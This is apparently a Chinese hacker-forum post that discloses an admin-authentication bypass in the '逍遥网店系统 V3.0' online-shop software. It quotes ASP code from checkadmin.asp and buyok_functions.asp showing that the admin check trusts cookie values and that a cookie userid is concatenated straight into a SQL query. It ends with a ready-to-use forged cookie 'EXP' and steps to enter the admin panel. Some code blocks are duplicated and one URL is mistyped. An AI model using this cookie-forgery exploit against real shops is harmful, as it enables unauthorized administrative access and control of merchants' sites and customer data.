正版逍遥网店系统 V3.0
BY:风之传说
刚才我挖了一个洞,然后我一个朋友刚好又叫我帮他看源码郁闷又发现了一个~!这人品是咋滴。。
当然还很感谢心灵大牛的指导哈哈~!
OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了。于是我又来到后台,看了下检测文件,悲剧由此产生:
漏洞文件:checkadmin.asp
<!--r /> if request.cookies("buyok")("admin")="" then response.write "<meta http-equiv='refresh' content='0;URL=../admin.asp'>"
-->
-->
大家看到这里一定以为很简单吧,呵呵 直接COOKIE欺骗就可以进后台,如果真的这样我就不发了~!留个悬念让大家去试试。
然后我进入后台,http://127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。
index.asp
<!--#include file="checkadmin.asp"-->
<script>// <![CDATA[
if (top != self)top.location.href = "index.asp";
// ]]></script>
<script>// <![CDATA[
if (top != self)top.location.href = "index.asp";
// ]]></script>
看到这里我奇怪了,是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。
继续跟进。代码就不发了免得多,最后发现了一个文件。
漏洞文件:include\buyok_functions.asp
下面贴出部分代码:
set rscheck=conn.execute("select * from buyok_user where UserId='"&request.cookies("buyok")("userid")&"'")
if rscheck.eof and rscheck.bof then
response.write "<script>// <![CDATA[
"
response.write "alert('对不起,您还没有注册或登陆。');"
response.write "location.href='javascript:history.go(-1)';"
response.write "
// ]]></script>"
response.end
if rscheck.eof and rscheck.bof then
response.write "<script>// <![CDATA[
"
response.write "alert('对不起,您还没有注册或登陆。');"
response.write "location.href='javascript:history.go(-1)';"
response.write "
// ]]></script>"
response.end
看到这里大家都懂了吧 呵呵~!
OK附上EXP:
KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;
修改COOKIE 然后直接进入http://l127.0.0.1/admin/index.asp.
后台:http://localhost/admin/login.asp